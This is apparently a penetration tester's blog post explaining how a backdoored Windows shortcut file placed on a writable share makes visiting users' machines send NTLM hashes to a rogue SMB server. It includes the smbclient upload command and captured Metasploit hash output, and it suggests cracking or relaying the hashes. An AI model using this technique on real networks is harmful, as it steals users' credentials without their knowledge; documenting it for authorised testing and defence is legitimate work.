You down with LNK?

Oftentimes on an Internal pen test, I find myself with a limited-privilege domain user account. On a recent test, I got ahold of an account like this through various means of hackery. It didn't have local admin anywhere, it wasn't a member of any IT groups; it was just a super low privilege user from the Marketing department. The only real privilege it had was write access to the Marketing share. In a quest to gather more user accounts, I decided to abuse my write access to the share and drop a backdoored shortcut file.

The idea here is that we can create a random shortcut file that goes nowhere, but pulls its icon image from a remote share. When a domain user visits the marketing share with the malicious LNK file in it, Windows tries to load up all the pretty icons for the files on the share. In our case, Windows tries to grab the icon for our malicious LNK file, sees that it's on another share, and attempts to auth to the remote share to get the icon file. That remote share just so happens to be our rogue SMB server (running static challenges for Rainbow Tables goodness, of course).

Lets get to work.
Fire up a Windows machine to create a random shortcut file, and then edit the settings to have it pull its icon image from a local network share. Then, use a hex editor to swap the IP and sharename to point to our SMB listener:



Now, lets drop this file on our Marketing share:

# smbclient -U BANANASTAND/user%pass //10.0.0.5/marketing/Domain=[BANANASTAND] OS=[EMC-PEEL] Server=[COLDSTORAGE1]smb: \> put trustwave.lnkputting file trustwave.lnk as \trustwave.lnk (58.0 kb/s) (average 58.0 kb/s)smb: \> dir  .                                   D        0  Wed Mar 28 14:07:44 2012  Thumbs.db                          HS    94208  Tue Mar  6 09:56:01 2012  Sales Folder                        D        0  Thu Mar  8 11:36:10 2012  SCANNED CONTRACTS.lnk                      210  Mon Feb 13 12:52:04 2012  Shortcut to Sales Folder.lnk               279  Fri Oct 21 09:15:08 2011  Client folder                       D        0  Tue Mar 20 15:49:35 2012  trustwave.lnk                        A      475  Wed Mar 28 14:07:44 2012  Sales Folder - Shortcut.lnk                635  Tue Mar  6 09:55:09 201256721 blocks of size 8388608. 12215 blocks available

Great! When anyone visits the marketing share, they will see this inconspicuous shortcut file:



By the time they see it, their goose has already been cooked (er...hacked?). Their workstation has already gone hunting for the icon file located on our rogue SMB share:

msf  auxiliary(smb) >[*] SMB Captured - 2012-12-10 12:32:00 -0500NTLMv2 Response Captured from 10.0.0.104:49240 - 10.0.0.104USER:pc903423 DOMAIN:BANANASTAND OS: LM:LMHASH:Disabled LM_CLIENT_CHALLENGE:DisabledNTHASH:5630qw4fwer7013acf5665bre2d2weab8 NT_CLIENT_CHALLENGE:0101000000000000sdfh22353yk2356jl450239r7ebwe093ew00000000020000000000000000000000

That's it. By simply tricking a user into browsing a share, we can grab their password hash and start crackin' (or smb_relay them, if you are feeling lucky). What's nice about this attack is that it isn't limited to your local broadcast net like ARP Spoofing or any of the NBNS / LLMNR trickery. Its also pretty stealthy, there is no pop up boxes or error messages - Windows tries to auth to the SMB server, fails to get the icon file, and just moves on. This gives you the opportunity to quietly collect password hashes from several other users and propagate throughout the network nicely. Mmmmm, hashes.